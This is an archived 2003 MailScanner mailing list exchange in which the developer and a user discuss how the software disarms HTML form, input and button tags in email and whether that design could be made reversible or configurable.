Allow ..... Tags = disarm

Julian Field mailscanner at ecs.soton.ac.uk
Wed Nov 5 15:34:39 GMT 2003


At 15:07 05/11/2003, you wrote:
> > -----Original Message-----
> > From: Julian Field [mailto:mailscanner at ECS.SOTON.AC.UK]
> > Sent: Wednesday, November 05, 2003 6:46 AM
> > To: MAILSCANNER at JISCMAIL.AC.UK
> > Subject: Allow ..... Tags = disarm
> >
> > Disarming Form Tags
> >
> > A "Form" tag is replaced with a "MailScannerFormxxxx" tag,
> > where xxxx is an
> > essentially random number (it's actually the process id). As
> > this is an
> > HTML tag not recognised by your email client (or web browser)
> > it will just
> > be ignored completely, as it should be according to the HTML spec.
> > An "Input" tag is modified so its type is a "reset" button, and all
> > JavaScript "on..." methods are removed.
> > A "Button" tag is modified so its type is a "reset" button, and all
> > JavaScript "on..." methods are removed.
>
>What's the point of disarming input tags when form tags are taken out?  An
>input without a form does nothing.

Are you sure that is the case in every badly written browser? Agreed the
normal form submission actions can't happen, but what happens if you put an
onClick event in a button that is not within a form. Can you guarantee
someone won't let you do that?

>Changing the type of buttons seems like a very bad idea to me - I can easily
>imagine a lot of confusion resulting and it doesn't seem like a useful
>change.

I needed to change them to be able to guarantee they won't do anything.
Feel free to change the code if you don't like it :-)


> > Notes
> >
> > The point of the xxxx number on the end of each tag name is to protect
> > against an attack in which a new XML object or stylesheet
> > setting is used
> > to create a new tag called "MailScannerForm" which has the
> > same actions as
> > a conventional "Form" tag.
>
>I would prefer that the changes to the HTML be reversible - this makes that
>more difficult.  Wouldn't it be just as useful to prepend
>"MailScanner_%orgname%_"?  Seems like that would be enough to defeat the
>attack.  And blocking both <script> tags and on* attributes means there's
>nothing left that can examine the DOM to figure out the %orgname% string
>dynamically.
>
>Although I like the ability to disarm Javascript on* attributes, I'd prefer
>they were just disarmed, not removed.  Makes debugging much easier.  Ditto
>for codebase attributes.
>
>And although it's great to have this implemented in MS at all (thanks!), I
>wish it were just a list of tags I could specify arbitrarily.  For example,
>a new config file variable, "Tags To Disarm" could be defined.  It could
>contain either a ruleset or a list of tags.  The tags in the list would get
>"disarmed" by prepending something like "MailScanner_%orgname_" to them.

That's not a bad idea.
--
Julian Field
www.MailScanner.info
MailScanner thanks transtec Computers for their support

PGP footprint: EE81 D763 3DB0 0BFD E1DC  7222 11F6 5947 1415 B654



More information about the MailScanner mailing list